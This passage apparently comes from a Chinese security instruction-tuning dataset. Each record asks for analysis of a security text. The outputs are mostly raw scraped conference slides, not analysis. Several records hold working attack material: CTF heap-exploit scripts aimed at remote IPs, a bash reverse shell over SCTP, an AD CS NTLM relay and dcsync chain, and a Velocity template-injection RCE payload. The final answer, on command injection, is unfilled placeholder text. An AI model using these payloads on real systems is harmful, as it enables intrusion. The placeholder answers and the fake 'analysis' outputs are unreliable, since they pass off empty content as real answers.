多字典挂载 ```bash root@John:~/wordlist/small# dirb http://192.168.1.102 ./ASPX.txt,./DIR.txt  DIRB v2.22 By The Dark Raver  START_TIME: Sun Feb 17 23:31:02 2019 URL_BASE: http://192.168.1.102/ WORDLIST_FILES: ./ASPX.txt,./DIR.txt  GENERATED WORDS: 1975  Scanning URL: http://192.168.1.102/  + http://192.168.1.102//Index.aspx (CODE:200|SIZE:2749) + http://192.168.1.102//Manage/Default.aspx (CODE:302|SIZE:203) + http://192.168.1.102//bbs (CODE:301|SIZE:148) + http://192.168.1.102//manage (CODE:301|SIZE:151) + http://192.168.1.102//manage/ (CODE:302|SIZE:203) + http://192.168.1.102//kindeditor/ (CODE:403|SIZE:218) + http://192.168.1.102//robots.txt (CODE:200|SIZE:214) + http://192.168.1.102//Web.config (CODE:302|SIZE:130) + http://192.168.1.102//files (CODE:301|SIZE:150) + http://192.168.1.102//install (CODE:301|SIZE:152) (!) FATAL: Too many errors connecting to host (Possible cause: EMPTY REPLY FROM SERVER)  END_TIME: Sun Feb 17 23:31:06 2019 DOWNLOADED: 1495  FOUND: 10 ``` ![](media/544ad274590fbcca704dd16b8186", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDec 2017 Copyright*LAC*Co.,*Ltd.*All*Rights*Reserved. Yoshihiro Ishikawa Open%Source%as%fuel%of%recent%APT Copyright*LAC*Co.,*Ltd.*All*Rights*Reserved. Who%am%i?%  Organization:*LAC*  Department:*Cyber*Counter*Threat*Team*  Job*Title:*Security*Researcher* CISSP yoshihiro.ishikawa[at]lac.co.jp Yoshihiro*Ishikawa* 2 Copyright*LAC*Co.,*Ltd.*All*Rights*Reserved. Agenda n Purpose* n Open*Source*Malware*Targeting*MacOS* n PowerShell*Empire*improperly*used* n Prevention*method* n Conclusion* 3 Copyright*LAC*Co.,*Ltd.*All*Rights*Reserved. Purpose PowerSploit** Tiny*SHell n Recently,*there*are*so*many*APT*attacks* fueled*by*the*usage*of*the*open%source%tools% and%malware.* n Why?* n Actors*performing*attacks*using%open%source%tools% are*becoming*more%easy%and%more%resourceful.* n Actors*are likely*anonymize*their*attacks.* n Actors*usually*modified*their*attack*code*and* created%a%new%customized%malware*easily.* Koadic QuasarRAT mimikatz* Trochilus Pupy* 4 Nishang* Copyright*LAC*Co.,*Ltd.*All*Rights*Reserved. Purpose:%APT%groups%with%Open%Source%Tools n APT10*(menuPass):*PowerSploit,*Koadic,*QuasarRAT,*Redleaves(Trochilus)* n Public,*Technology,*Energy*sectors,*etc*(USA,*Canada,*UK,*France,*South*Korea,*Japan,*etc)[1]* n Cloudy*Omega*(Blue*Termite):*mimikatz* n Some*companies,*no*specific*trends*(Japan)* n Tick*(BRONZE*BUTLER):*mimikatz* n Critical*Infrastructure*and*manufacture*(South*Korea*and*Japan)* n PassCV/BARIUM*(Winnti?)[2][3]:*Metasploit,*BeFF* n Game*makers*(USA,*China,*Russia,*South*Korea,*Taiwan*and*Japan)* n Unsure*Group*(APT10):*PowerShell*Empire* n Political*and*academic*sectors*(Japan)* In*this*presentation,*I*will*introduce*PassCV*and* Unsure%Groups%TTPs*confirmed*in*Japan*in*2017* 5 CYBER - EDUCATION - PENTEST - JSOC - 119 - CONSULTING We provide IT total solutions based on advanced security technologies. Copyright*LAC*Co.,*Ltd.*All*Rights*Reserved. Open Source Malware Targeting MacOS Copyright*LAC*Co.,*Ltd.*All*Rights*Reserved. Open%source%malware%variant%", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInformation Security Operation providers Group Japan ISOG-J How to make your SOC/CSIRT team more trustworthy?: ISOG-J Maturity Model and self-checking tool Yasunari Momoi momo@iij.ad.jp Internet Initiative Japan Inc. / ISOG-J 1 ISOG-J Information Security Operation providers Group Japan Agenda  about me  what is ISOG-J?  past ISOG-J activities  building security team  documents and frameworks  improving your security team using the viewpoint of operation  introduce some ISOG-Js documents and tools  some interest points of evaluating results  Cybersecurity information sharing 2 ISOG-J Information Security Operation providers Group Japan About me  momo: Yasunari Momoi  Internet Initiative Japan Inc., IIJ-SECT member  Office of Emergency Response and Clearinghouse for Security Information, Advanced Security Division  Facebook ymomoi Twitter @sbg  Security, SOC/CSIRT, Software Developer, Server/Network Engineer  Develop some managed security services, operators dashboard, software tools for analyzing security logs, etc...  Acting as a CSIRT member  FIRST, FIRST Japan Teams, NCA (Nippon CSIRT Association)  ISOG-J, ICT-ISAC  Special Interest  local foods, Heavy Metal, cats 3 ISOG-J Information Security Operation providers Group Japan WHAT IS ISOG-J? 4 ISOG-J Information Security Operation providers Group Japan What is ISOG-J  the Information Security Operation providers Group Japan  established 2008  ISOG-J is a professional community for security operation providers  a forum to share information about security operation and resolve common issues.  ISOG-Js pronunciation is ee-sog-jay  the meaning is Got to hurry, Japan!  http://isog-j.org/e/ 5 ISOG-J Information Security Operation providers Group Japan 2009 established IIJ, IIJ Technology, NTT Data, NEC, NTT, Hitachi Systems, Fujitsu, MBSD, NRI Secure, LAC BBSec, NECXS, NTTCom, DIT, Fujitsu SSL, IBM Japan 2008 Kaspersky labs Japan, Softbank Technology 2010 NTT Data Security, UBSecure 2011 MIND, UNIS, UNIADEX 2012 Tricoder", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 2  We all hear about anti-phishing gadgets that cost an arm and a leg.  Im here to tell you why youll pay for it, even though it doesnt work.  Because youre going to fall into the trap, just like everyone else. Plan to fail now.  Lets get on with it. 3  \"Please mail us your username, password and token.\"  People wont federate  People lose them, type them in backwards, etc... etc...  Can anyone beat the record of 13 keyfobs?! 4  Hackers don't use .bank and no one notices anyway.  Only banks can use it? Can I have .momandpa pls?  Wait, why again are we building another EV Cert? 5  Phishers don't use SSL  Prohibitively expensive for ma and pa retailers  Users don't get it anyway  Look for the lock messaging is lost GridOne 01878796 01 87 87 96 ISSA Snake oil 7  MIT study  People dont notice if its changed or even not there at all!  Man in the middle attacks  Phishers can simply say, We lost your sitekey image, could you pick a new one, kthksbye 8  The vast majority of trusted sites still have:  XSS  CSRF  SQLInjection  Command injection 9  Don't use any sort of email, phone or FAX encryption with their customers/clients  Don't have any brute force detection (or if they do, only vertical)  Don't force strong passwords, auto log out, automatic password change, etc...  Do have downloads over HTTP! Weee! 10  Yup, youre going to pay for all those same nearly pointless security doo- dads even though you havent fixed any of your other issues! 11  Bear analogy. (I hate that analogy, btw). We are bidding up our security.  Yes, you will probably buy snake oil, just like everyone else.  Can you blame the vendors for monetizing our problems with the latest security widget?  Plan to fail - youre probably already doing it!", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" t .TH \"SYSTEMD\\-FIRSTBOOT\" \"1\" \"\" \"systemd 231\" \"systemd-firstboot\" .\\\" ----------------------------------------------------------------- .\\\" * Define some portability stuff .\\\" ----------------------------------------------------------------- .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\\\" http://bugs.debian.org/507673 .\\\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \\n(.g .ds Aq \\(aq .el .ds Aq ' .\\\" ----------------------------------------------------------------- .\\\" * set default formatting .\\\" ----------------------------------------------------------------- .\\\" disable hyphenation .nh .\\\" disable justification (adjust text to left margin only) .ad l .\\\" ----------------------------------------------------------------- .\\\" * MAIN CONTENT STARTS HERE * .\\\" ----------------------------------------------------------------- .SH \"NAME\" systemd-firstboot, systemd-firstboot.service \\- 初始化基本系统设置 .SH \"SYNOPSIS\" .HP \\w'\\fBsystemd\\-firstboot\\fR\\ 'u \\fBsystemd\\-firstboot\\fR [OPTIONS...] .PP systemd\\-firstboot\\&.service .SH \"描述\" .PP \\fBsystemd\\-firstboot\\fR 既可以在系统首次启动时交互式的初始化最基本的系统设置 也可以在创建新系统镜像时非交互式的初始化最基本的系统设置 这些最基本的系统设置包括 .sp .RS 4 .ie n \\{\\ \\h'-04'\\(bu\\h'+03'\\c .\\} .el \\{\\ .sp -1 .IP \\(bu 2.3 .\\} 本地化 也就是 \\fILANG=\\fR 与 \\fILC_MESSAGES\\fR 两个环境变量 .RE .sp .RS 4 .ie n \\{\\ \\h'-04'\\(bu\\h'+03'\\c .\\} .el \\{\\ .sp -1 .IP \\(bu 2.3 .\\} 时区 .RE .sp .RS 4 .ie n \\{\\ \\h'-04'\\(bu\\h'+03'\\c .\\} .el \\{\\ .sp -1 .IP \\(bu 2.3 .\\} 主机名 .RE .sp .RS 4 .ie n \\{\\ \\h'-04'\\(bu\\h'+03'\\c .\\} .el \\{\\ .sp -1 .IP \\(bu 2.3 .\\} \"machine ID\" .RE .sp .RS 4 .ie n \\{\\ \\h'-04'\\(bu\\h'+03'\\c .\\} .el \\{\\ .sp -1 .IP \\(bu 2.3 .\\} root 用户的密码 .RE .PP 所有上述设置既可以交互式的向用户询问 也可以非交互式的通过命令行选项指定 还可以从创建新系统镜像的主机复制而来 .PP 如果某个设置已经被初始化 那么将不会覆盖已有的设置 并且不会提示用户设置此项 .PP 与 \\fBlocalectl\\fR(1), \\fBtimedatectl\\fR(1), \\fBhostnamectl\\fR(1) 不同此工具直接操作文件系统上的配置文件 并不需要任何系统服务的支持 因此 \\fBsystemd\\-firstboot\\fR 可用于设置一个已挂载(但未启动)的系统镜像 不应该在", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nReal World Privacy DEFCON 12 July 30, 2004 Real World Privacy How to leave fewer breadcrumbs in life by Roger Cooke n0namehere@yahoo.com Real World Privacy DEFCON 12 July 30, 2004 What are you talking about? The focus here is not a why talk, were talking the how. If you need to know why, leave your full name, DOB and SSN with me and Ill get back to you (perhaps youll get back to yourself). Real World Privacy DEFCON 12 July 30, 2004 If information doesnt exist, it cant be  Used against you  Used for you  Subpoenaed  Stolen or lost A key principle in being private Real World Privacy DEFCON 12 July 30, 2004 Privacy may not be free and there may be a direct cost to being anonymous: - No award points (airlines, hotels, grocery store) - Higher fees at retail stores (grocery store) - No subscription discounts - No credit card benefits (buyer protection) - No insurance on belongings Privacy can have monetary costs. Are you willing to pay? Real World Privacy DEFCON 12 July 30, 2004 Your name and who you are? Where you live? What you spend your money on? Your hobbies? Why you visited the doctor? Where you travel to? Where you work? How much you (dont) make? Your personal identifying information? Before thinking about protecting your privacy, ask what is it that you are trying to protect? Real World Privacy DEFCON 12 July 30, 2004 Nosy boss? Nosy neighbor/house mate? Ex-lover? Former professional associate? Random target of opportunity? Someone you accidentally pissed off? The Feds? Big Business? Different people want data for different reasons. Think before you give it up. Before thinking about protecting your privacy, ask who is the threat? Real World Privacy DEFCON 12 July 30, 2004 A 360-degree view of the customer is so tantalizing that most companies are virtually drooling over the prospect of being able to sell, service, market, cross- sell, and update sell from a common view of a customers history.  Information Week April 5, 2004 page 67 More on the threat Real World Pr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2 u Dongsung Kim u Graduate Student Researcher u @kid1ng u https://kidi.ng u Hackers In inTrusion Laboratory u https://hit.skku.edu Surname 1 4 u Samsungs smartwatch products  Track fitness; control smart devices; receive calls, texts, and emails; pay with NFC  Pair phone with Bluetooth + Wi-Fi (+ LTE)  App marketplace: Samsung Galaxy Apps u So much sensitive information  Contacts, calendar, location, email, notification,   Access to privileged resources must be controlled Image: Samsung 5 u Samsung Gear firmware consists of:  Tizens open source components  Samsungs closed source components u Linux-based open source OS  Many of Samsungs products  Smartwatches, smartphones, cameras, smart TVs, home appliances,  Image: Tizen Project, a Linux Foundation Project 6 u Ajin Abraham @ HITBSecConf u Amihai Neiderman @ Security Analyst Summit  40 0-day vulnerabilities u PVS-Studio 27 000 Errors in Tizen OS  900 code errors in a portion of Tizen source code u We focus on a smartwatchs perspective 2 - 9 - u Files, Directories, UNIX Sockets, Utilities u Applications  Use Tizen APIs to access the services u Services  Special privileged daemons dedicated for a resource  e.g., Wi-Fi, Bluetooth, GPS, messaging, sensors,   Must reject requests from unauthorized parties Source: Tizen Wiki 10 u App dev specifies privileges in manifest  User accepts the permission for the app  Installer checks and registers the privilege policy  Accesses are controlled at the runtime u Tizen defines many privileges  internet, bluetooth, network.set, screenshot, notification, email,   Only some of them are Public level  Partner, Platform level disallowed for most Source: Tizen Wiki Image: locked by Jenie Tomboc / CC BY tizen-manifest.xml .tpk app package On users smartphone Signed by Store 11 u DAC (Discretionary Access Control)  UNIX user ID + group ID policies u SMACK (Simplified Mandatory Access Control in Kernel)  Kernel-space MAC  App receives a unique label at install time  e.g., User::Pkg::sample_", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBCTF 2018 By Nu1L BCTF 2018 PWN easiest three hardcore_fmt SOS easywasm Reverse easypt Web checkin SimpleVN babySQLiSPA SEAFARING1 SEAFARING2 Crypto guess_polynomial guess_number BlockChain EOSGame Fake3D MISC easysandbox https://bctf.xctf.org.cn/ 1127 14:00 - 1129 02:00 PWN easiest Double Freetcache Leak GOT0x40size from pwn import * #p = process('./easiest') p = remote('39.96.9.148', 9999) def add(idx, size, c): p.recv() three p.sendline('1') p.recvuntil('(0-11):') p.sendline(str(idx)) p.recvuntil('Length:') p.sendline(str(size)) p.recvuntil('C:') p.sendline(c) def dele(idx): p.recv() p.sendline('2') p.recvuntil('(0-11):') p.sendline(str(idx)) add(0, 0x38, 'aaa') add(1, 0x38, 'bbb') dele(0) dele(1) dele(0) add(2, 0x38, p64(0x60203a)) add(3, 0x38, p64(0x60203a)) add(4, 0x38, p64(0x60203a)) add(5, 0x38, '\\x40\\x00\\x00\\x00\\x00\\x00' + p64(0x400946) * 5) p.interactive() from pwn import * def add(cont): p.recvuntil('choice') p.sendline('1') p.recvuntil('content:') p.send(cont) def edit(idx,cont): p.recvuntil('choice') p.sendline('2') p.recvuntil('idx') p.sendline(str(idx)) p.recvuntil('content:') p.send(cont) def dele(idx,cl = 'n'): p.recvuntil('choice') p.sendline('3') p.recvuntil('idx') p.sendline(str(idx)) p.recvuntil('):') p.sendline(cl) while True: try: p=remote('39.96.13.122', 9999) #p=process('./three')#,env={'LD_PRELOAD':'./libc.so.6'}) add('\\n') add('\\n') add((p64(0xc0)+p64(0x21))*4) dele(2,'y') dele(1,'y') dele(0) edit(0,'\\x70') add('\\x70') add('\\n') edit(0,p64(0)+p64(0x91)) dele(1,'y') dele(2) dele(2) dele(2) dele(2) dele(2) dele(2) dele(2) edit(0,p64(0)+p64(0x51)) dele(2) edit(0,p64(0)+p64(0x91)) dele(2,'y') x = 0xa8#int(raw_input(),16)# edit(0,p64(0)+p64(0x51)+'\\xe8'+chr(x)) add('\\xe8'+chr(x)) #add(p64(0xffffffffff600400)) add(p64(0)) dele(1) dele(1,'y') edit(0,p64(0)+p64(0x51)+'\\x78') edit(2,p64(0xffffffffff600400)) add('\\x78') dele(1,'y') add('\\xd8'+chr(x)) dele(0,'y') add('\\x40') dele(0,'y') add('\\n') dele(0,'y') add('/bin/sh\\x00') BCTF{U_4r3_Ready_For_Ho", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\napt install lksctp-tools modprobe sctp lsmod | grep sctp checksctp  run SCTP server in one terminal, sctp_darn -H 0 -P 2500 -l sctpshell 0x00 0x01 run SCTP client in another terminal, sctp_darn -H 0 -P 2600 -h 127.0.0.1 -p 2500 -s     0x02   sudo apt-get install ksh /bin/bash -i > /dev/sctp/host/port 2>&1 0>&1 //bash /bin/ksh -i > /dev/sctp/host/port 2>&1 0>&1 //ksh 0x03 shell   0x04", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nESC8是一个http的ntlm relay原因在于ADCS的认证中支持ntlm认证 默认即存在 下面开始攻击复现首先我们需要搭建一个辅助域控 勾选域服务 安装即可同理设置为域控 选择添加到现有域 选择从主域复制 重启后测试 下面即可开始攻击 1 python3 Petitpotam.py u '' d '' p '' \"ntlmrelay address\" \"DC02 addres s\" 1 ntlmrelayx.py t http://adcs/certsrv/certfnsh.asp smb2support adcs t emplate 'DCTest' 获取到证书 然后使用证书请求DC02$的票据 获取票据成功 mimikatz进行dcsync 然后进行pth攻击获取域控权限 出现错误的话可以参考https://github.com/SecureAuthCorp/impacket/pull/1101", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhy Anomaly Based Intrusion Detection Systems are a Hax0rs Best Friend By David Maynor GT Information Security David.Maynor@oit.gatech.edu The history of the castle.  What is a Anomaly based IDS and how does it differ from Signature based systems? a. Signature based systems rely on static analysis of event. b. Anomaly systems rely on creating a baseline of normal activity then flag any deviations.  History a. Where they come from. b. What drives their development. How the castle is built.  How anomaly based systems work. a. A baseline is normally gathered during a tuning phase. Gather all traffic, analyze it, store it. b. Data mining process that does statistical analysis of data.  Theory behind them.  a. If its traffic that hasn't been seen before, its bad.  b. Attacks cause things the system has not seen before. How the castle is built. (cont.)  Can science brewed in research labs work in the wild? a. Eggheads can build rockets, but can they build security products? b. Crackers excel at creating attacks that bypass security models, why is traffic analysis any different?  Hardware based considerations. a. What kind of hardware is required to make this a effective scalable solution? b. Type of information that would have to be stored leads to huge hardware requirements. c. Speed. -sniffing -analysis The castle was built on a shaky foundation.  Problems. a. Unwieldy size. b. Hardware limitations. c. Integration of network changes.  Things anomaly based systems assume. a. If it hasn't been seen before, its bad. b. Machines have normal patterns that can be easily distinguished. c. Networks dont change.  This is somewhat of a half-truth. The castle was built on a shaky foundation. (cont.)  Why it is so hard to tell good traffic from bad traffic? a. Anomaly based systems rarely look at the payload. b. If network runs in a nonstandard configuration there are problems. c. Attacks against commonly used services on the machines are ignored.  Web server attacks against public", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRF-ID and Smart-Labels: Myth, Technology and Attacks DefCon 2004 July 30 - August 1, Alexis Park, Las Vegas, NV Lukas Grunwald DefCon 2004 RF-ID and Smart-Labels: Myth, Technology and Attacks  p. 1 Agenda What is RF-ID ? What is RF-ID and what are Smart-Labels Risks and dangers with them Fun with them, how to protect your privacy Attacks against Smart-Label Systems, RF-ID Systems Demonstration of RF-ID Tags and RF-DUMP in practical use The RSA-Blocker-Tag fake The Metro Future Store RF-ID and Smart-Labels: Myth, Technology and Attacks  p. 2 RF-ID RF-ID (Radio Frequency Identification) is a mechanism to get an identification remotely from: your remote-control for your garage an access control-system for a room a cage in a factory an electronic product code attached to a wrapped item in the supermarket RF-ID and Smart-Labels: Myth, Technology and Attacks  p. 3 Frequencies RF-ID (Radio Frequency Identification) operates globally on different frequencies, the most common systems are using the ISM (Industrial Science Medical) Bands: 6765 - 6795 kHz 40,66 - 40,7 MHz 24 - 24,25 GHz 13553 - 13567 kHz 433,05 - 434,79 MHz 61 - 61,5 GHz 26957 - 27283 kHz 2400 - 2500 MHz 122 - 123 GHz RF-ID and Smart-Labels: Myth, Technology and Attacks  p. 4 Smart Labels - EPC Smart-Labels are a special form of an RF-ID application. The tags look like normal product tags, but inside is an antenna and a small microchip. The tags have a Serial Number and an EEPROM that can store information like the EPC (Electronic Product Code), an international unique code from the manufacturer. Now the labels have mobile communication capabilities. EPC Type 1 01 0000A66 00016F 000169DCD Header EPC Manager Object Class Serial Number 8 Bit 24 Bit 24 Bit 36 Bit The ISO-Standard Smart-Labels operate on the ISM Frequency 13.56 MHz RF-ID and Smart-Labels: Myth, Technology and Attacks  p. 5 Smart-Label - Variants Some of the well-known cheap Smart-Labels youll find today and tomorrow in some consumer-products are: ISO 1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nI Hunt Penetration Testers: More Weaknesses in Tools and Procedures Wesley McGrew, Ph.D. wesley@mcgrewsecurity.com Page ! of ! 1 21 DRAFT Final paper and slide release during DEF CON 23 at mcgrewsecurity.com and available on defcon.org shortly afterwards. Trust me, youll want the final copy. ABSTRACT When we lack the capability to understand our tools, we operate at the mercy of those that do. Penetration testers make excellent targets for bad actors, as the average testers awareness and understanding of the potential risks and vulnerabilities in their tools and processes is low, and the value of the information they gather and gain access to among their client base is very high. As demonstrated by Wesleys DEF CON 21 talk on vulnerabilities in penetration testing devices, and last years compromise of WiFi Pineapple devices, the tools of offensive security professionals often represent a soft target. In this talk, operational security issues facing penetration testers will be discussed, including communication and data security (not just bugs), which impact both testers and clients. A classification system for illustrating the risks of various tools is presented, and vulnerabilities in specific hardware and software use cases are presented. Recommendations are made for improving penetration testing practices and training. This talk is intended to be valuable to penetration testers wanting to protect themselves and their clients, and for those who are interesting in profiling weaknesses of opposing forces that may use similar tools and techniques. Page ! of ! 2 21 INTRODUCTION 4 MOTIVATION 4 TERMINOLOGY 4 ASSUMPTIONS ABOUT ATTACKER CAPABILITIES 5 VALUE OF TARGETING PENETRATION TESTERS 6 VICTIMOLOGY 6 GOALS 7 OPERATIONAL SECURITY ISSUES 8 STANDALONE EXPLOITS PAYLOADS 8 DATA IN TRANSIT 10 EXTENDING NETWORKS 11 DATA AT REST 11 POINT OF CONTACT COMMUNICATIONS 12 CLASSIFYING PENTESTING TOOL SAFETY 12 CLASSIFYING PENETRATION TESTING TOOL SAFETY 12 CASE STUDY: KALI LINUX TOO", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefCon 21, Las Vegas 2013 Lets Screw With nMap Gregory Pickett, CISSP, GCIA, GPEN Chicago, Illinois gregory.pickett@hellfiresecurity.com Hellfire Security Overview Nosey Bastards! All About Packet Normalization Working It All Out Putting It Into Practice Finishing Up Network Defenders We see scans and probes of our network every day From the inside and from the outside Everybody is targeting us Identifying our assets How They Do It Network stack implementation is highly discretionary Differences identify the operating system type and version Allowing Attackers to identify their targets By matching the headers of their target to known operating system implementations  then its likely a Windows 2003 Sever! Uses the following options MSS of 1460 Single NOP Window Size 0 Single NOP Single NOP Ending SACK If your target  Has a TTL of 128 Implications If they identify your assets  They know their weaknesses How to attack them successfully Without triggering your sensors TSA-Style patdowns  Its fact of life But does it have to be? Why cant we  Remove the differences To remove their advantage Strip them of their ability to fingerprint To significantly reduce their chance of success My Answer Packet ization OK. What is packet normalization? Had anyone thought of this before? Not an entirely developed concept Many expressions but most incomplete  Normalization vs. Scrubbing Scrubbing is to do away with; cancel Normalization is to make normal, especially to cause to conform to a standard or norm Both are seen in varying degrees Scrubbing Used by a number of firewalls Randomize IP ID Clear IP DF Also  Set IP tos/dscp, and ttl IP Fragment Reassembly Primarily Concern Policy Violations Abnormal Packets Abnormal Flows Scrubbing Custom patch for netfilter Random IP ID Randomize TCP Timestamp Randomize TCP SEQ Clear IP tos/dscp IP TTL Tinkering Developed by Nicolas Bareil Mentions fingerprint prevention Host Only Scrubbing Used by some network devices such as Cisco ACE and ASA Rando", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nConfluence SSTI via Velocity 0x00 前言 之前的文章CodeQL在Shiro550中的应用的小结里有写到自己关于 漏洞分析 的浅薄理解, 机械地跟进代 码其实并没有太大的意义, 意识到这个问题后的自己也在刻意地练习自己写文章的风格, 希望能改掉一些不好的 习惯 0x01 简介 本文将要介绍以下内容: 模板引擎 Velocity 基础使用 模拟挖掘 CVE-2020-4027 怎么选择切入点 遇到问题 解决问题的过程 逐步构造出可利用的 Exploit 漏洞复现 本文的侧重点: 思考 & 记录如何站在漏洞挖掘者的角度去正向地分析漏洞 0x02 模板引擎 Velocity Velocity 部分主要关注两点: 基本语法 (能看懂 poc/exp) 如何作为 RCE Sink触发 (弹计算器) 基本语法和使用 Velocity 是一个基于 Java 的模板引擎template engine, 允许使用模板语言template language来引用由 Java 代码定义的对象 Velocity 同时可实现页面静态化, 将Java代码与网页分开, 使网站可维护性增强, JSP 的平替代方案 0常见符号介绍 符 号 含义 # 关键字使用#开头, 如#set#if#else#end#foreach等 $ 变量都是使用$开头的, 如: $name$msg {} 需要明确表示的变量, 可用{}将变量包含如需要有$someoneName这种内容, 此时为了让 Velocity区分, 可使用${someone}Name  如果某个变量不存在, 页面中会显示$xxx的形式, 为了避免这种形式, 可在变量名称前加上如 页面中有$msg, 有值, 显示msg的值不存在就显示$msg 通过例子来学习基本语法 1如何定义变量 ? 执行结果 2如何给变量赋值 ? 赋值规范 #set($prefix = \"hello\") #set($name = \"velocity\") #set($template = \"$prefix $name\") $template 这是注释 变量引用 #set($bill = \"hello\") #set($name = $bill) 字符串 #set($name.pre = \"cn\") 属性引用, velocity 会将属性解释为属性的get方法 #set($name = $people.name) $people.name 等同于 $people.getName() 方法引用 #set($name.first = $peolpe.getFirstName($name)) 左边必须是变量, 或者是属性的引用 右边可以是变量引用字符串属性引用方法引用数字数组 3如何定义一个循环语句 ? 执行结果 4如何定义条件语句 ? 执行结果 5如何定义宏(函数) ? 1. 无参数的宏 #foreach( $num in [010]) this is $num.\"\\n\" #end #foreach($num in [02]) #if($num 2) this $num , hello velocity #else #end #end 执行结果 2. 有参数的宏 执行结果 如何作为 RCE Sink 触发 执行结果 定义了一个宏, 名字为 getName, 没有参数 #macro(getName) pen4uin #end 使用该宏, velocity 处理 #getName() 时会将其替换为 pen4uin this is #getName() 定义了一个宏, 名字为 greet, 参数是 $name #macro(greet $name) hello $name, this is pen4uin #end #greet() #* 定义一个变量 $clazz, 是字符串类型 通过 String 类型变量的 getClass() 方法取运行时类的对象 $obj 通过 Class 的静态方法 forName() 获取可供命令执行的类的对象 $rt 通过反射调用 getRuntime 获取 java.lang.Runtime 的实例并调用静态方法执行命令 *# #set($clazz=\"str\") $clazz.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).inv oke(null,null).exec('calc') 0x03 CVE-2020-4027 post-auth RCE 安全公告 Velocity Template Injection in Custom user macros - Macros Platform - ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntroduction SEH Basics Anti-RE Techniques Decrypting the Content Anti-RE Techniques in DRM Code Jan Newger Seminar on Advanced Exploitation Techniques i4, RWTH Aachen, Germany DEF CON 16 / 2008 Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Outline 1 Introduction Legal Issues About DRMs Approaching the DRM 2 SEH Basics Overview Exception Dispatching 3 Anti-RE Techniques Overview Trampolines Debug Registers P-Code Machine 4 Decrypting the Content The Algorithm Demo Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM Outline 1 Introduction Legal Issues About DRMs Approaching the DRM 2 SEH Basics Overview Exception Dispatching 3 Anti-RE Techniques Overview Trampolines Debug Registers P-Code Machine 4 Decrypting the Content The Algorithm Demo Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM Issues with this Talk Legal Issues Legal issues with publishing DRM research Probably illegal in most countries, legal uncertainty Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM Issues with this Talk Legal Issues Legal issues with publishing DRM research Probably illegal in most countries, legal uncertainty EFF to the Rescue! Electronic Frontier Foundation (EFF)[1] Non-profit organization dedicated to preserving free speech rights Discussed solution with Jennifer Granick from EFF (thx Jennifer!) Loophole in DMCA -> \"Encryption Research\"[2] But still too dangerous for me Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Legal Issues About DRMs Approaching the DRM Issues with this Talk (2) Consequence Strip details about key setup and decryption algorithm Dont reveal", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请解释命令注入的原理和防护方法", "input": "", "output": "命令注入是一种常见的网络安全威胁。攻击原理：[具体原理说明]。防护措施：1. [防护方法1] 2. [防护方法2] 3. [防护方法3]", "category": "security_knowledge", "source": "manual"}
